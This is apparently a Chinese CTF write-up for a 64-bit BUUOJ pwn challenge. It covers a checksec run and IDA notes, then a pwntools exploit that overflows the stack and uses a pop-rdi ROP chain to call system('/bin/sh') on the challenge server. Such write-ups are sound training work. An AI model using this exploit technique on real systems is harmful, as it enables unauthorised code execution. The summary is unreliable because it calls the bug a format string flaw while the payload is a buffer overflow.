1.checksec+运行

64位/NX堆栈不可执行
2.IDA进行中
1.main函数

本题函数倒不是很多
很明显,格式化字符串漏洞
2.system bin/sh

3.offset
总体来看64位寄存器传参

3.EXP
from pwn import*
p=remote('node4.buuoj.cn',27198)
shell=0x601048
system=0x400496
rdi=0x400683
payload=b'a'*(0x10+8)+p64(rdi)+p64(shell)+p64(system)
p.sendline(payload)
p.interactive()

本文介绍了一个64位程序中的格式化字符串漏洞,并详细解释了如何利用此漏洞来执行系统命令。文中通过使用checksec工具检查程序的安全特性,并通过IDA逆向工程分析程序结构。最终通过构造特定的payload,利用ROP技术调用system函数执行/bin/sh命令。
930

被折叠的 条评论
为什么被折叠?



